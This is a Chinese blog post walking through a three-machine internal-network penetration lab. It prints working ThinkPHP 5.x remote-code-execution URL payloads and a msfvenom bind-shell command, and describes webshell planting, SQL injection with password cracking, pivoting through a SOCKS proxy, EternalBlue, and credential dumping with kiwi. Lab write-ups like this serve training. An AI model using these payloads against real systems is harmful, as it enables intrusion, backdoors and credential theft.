内网渗透基础实验

一、靶场环境:

大体就是这环境,用Vmware创建三台虚拟机。ip地址随意配,只要保证能区分即可。

环境下载链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com

由于我这边vmware出了点小问题,自定义设置网络的时候老是提示正在加载虚拟网络,这样即使开机了ip地址也是不对的。故我采用的是强行修改配置文件的方式,直接用vs修改.vmx文件来实现网络分配。

二、正文:

一、Centos:

可以看到是v5.0的thinkphp,这种靶场大概率给我们准备了一个RCE漏洞,因为如果不是RCE则利用起来较为麻烦。

我们翻一下相关的关于ThinkPHP关于V5.0的漏洞文档来找突破点。

本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致远程代码执行漏洞的产生。漏洞影响版本:5.0.7<=ThinkPHP5<=5.0.22、5.1.0<=ThinkPHP<=5.1.30。不同版本 payload 需稍作调整:

5.1.x:

?s=index/\think\Request/input&filter[]=system&data=pwd

?s=index/\think\view\driver\Php/display&content=<<?php phpinfo();?>>

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<<?php phpinfo();

?>>

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x:

?s=index/think/config/get&name=database.username # 获取配置信息

?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件

?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

这里我们用

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id来尝试一下,发现能正常执行,这就是我们的第一台服务器的突破口了。

同时如果被禁了,还可以用文件包含,file_put_contents这些来尝试。

尝试写一个phpinfo,能正常访问,这样直接写一个webshll远程连接即可。

这里我们直接写一个一句话木马:

再用蚁剑连接:

我们拿到权限之后,ifconfig发现有两张网卡。在这里我们就可以考虑用msf或fscan来扫描一下环境来发掘可利用点。

这里我们采用msf生成一个后门文件:

再将生成的木马上传上去:

之后我们再会到kali上做好监听准备工作:

再回到centos那台主机上./msfshell.elf文件

成功监听。至此MSF后门也准备好了,这为我们深层次的入侵做好了准备。

一、fscan内网扫描:

我们通过蚁剑上传一个fscan,执行fscan扫描192.168.232.0/24网段,从而发掘有用信息。

从图中我们可以看到232.128 和232.129都有80端口,当然129的那个我们已经知道了 ,是centos的,232.128将是我们更深层次入侵的突破点。

二、通过msf代理,用nmap进行扫描:

目的与fscan相同,但我们尝试一下不同的方式。

随后我们再通过msf建立一个代理服务器:启动一个 SOCKS5 代理服务器,用于将你本地的网络流量通过被攻破的内网主机进行转发。这样我们的kali也可以连接到ubuntu上了。

通过proxychains 连接创建的msf代理来进行扫描。

当然这扫描速度感人。故我们一般还是采用fscan来扫描。

四、Ubuntu:

访问该地址,通过返回结果判断出部署了web服务。

(访问之前先登陆宝塔设置一下,把web的ip改成现ubuntu的ip,因为我们的ip设置和原作者不一样,否则访问的时候就没有界面了)

那么我现在的目标就是拿下这个八哥CMS作为我们吓一跳的跳板。

查看网页源码我们可以发现,我们的靶场搭建人相当贴心,已经提前把注入点告诉我们了。

在这之前我们也可以找找该网站的登陆窗口。

我们可以用目录爆破的方式,也可以用robots的方式来找。

这里我们直接用作者提供的注入点进行注入。(由于我这里msf抽风了,这里就用截图代替了QAQ)

表名这里我们是直接猜的,当然这是一个开源的cms,它的数据库叫什么名字也很容易知道。

知道admin的密码之后就随便拿一个在线网站进行解密即可。

解密之后admin密码为123qwe。

登进去之后我们就得找一个能让我们上传webshell的地方了,最终我们在模板管理位置找到了非常合适的写入点,因为它是加载页面的,故一定会执行。

访问该界面,出现了我们之前写入的"oupeng",故证明一句话木马已经加载进服务器了。

我们之后再用蚁剑连接即可。

至此我们拿下了第二个服务器。

但我们写木马的时候就得有些改动了,不向centos用的反弹木马,这个就得用正向木马,因为ubuntu它反弹也找不到kali机,没有去kali的路由。

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=12345 -f elf > shell.elf

生成正向木马,在把这个木马上传上去,步骤和第一个一样。

msf监听:

五、win7

经过扫描,我们会得到win7虚拟机的地址。大概率是叫我们用永痕之蓝漏洞。

这里我们主要是用前两个永恒之蓝漏洞。

从结果看确实是用的445端口作为突破口。

用永恒之蓝拿下基本上就是最高权限,在用kiwi,基本上很容易的就能拿到账号密码。

这里直接用了个本地端口转发方便后续以桌面的形式远程连接。

至此win7也通过远程桌面的方式连接上。

这样三台主机都成功拿下。

相关推荐
CertiK22 分钟前
CertiK实测:Skill扫描并非安全边界
人工智能·安全·openclaw
WZTTMoon1 小时前
从互斥锁到无锁,Java 20年并发安全进化史
java·python·安全
软件供应链安全指南1 小时前
跟随 Gartner 洞察:AIST 从单点能力到全域安全治理的蜕变
大数据·人工智能·安全·gartner·问境aist·aist
山川绿水1 小时前
bugku——MISC——键盘
安全·网络安全·系统安全·密码学
上海云盾-小余2 小时前
CC 攻击与 DDoS 联动防护:如何构建一体化流量清洗架构
网络·安全·游戏·架构·ddos
恒星科通2 小时前
旅游景区大功率高清晰应急疏散广播技术方案
安全·旅游·广播·应急广播
思慕很大很大2 小时前
Web安全:从“来源校验”到“CSRF Token”的演进
安全·浏览器
波兰的蓝2 小时前
CVE-2016-4437 Apache Shiro反序列化漏洞复现
web安全·网络安全
Old Uncle Tom4 小时前
OpenClaw 的安全分析
网络·安全
牢七5 小时前
jfinal_cms-v5.1.0 审计前缀
安全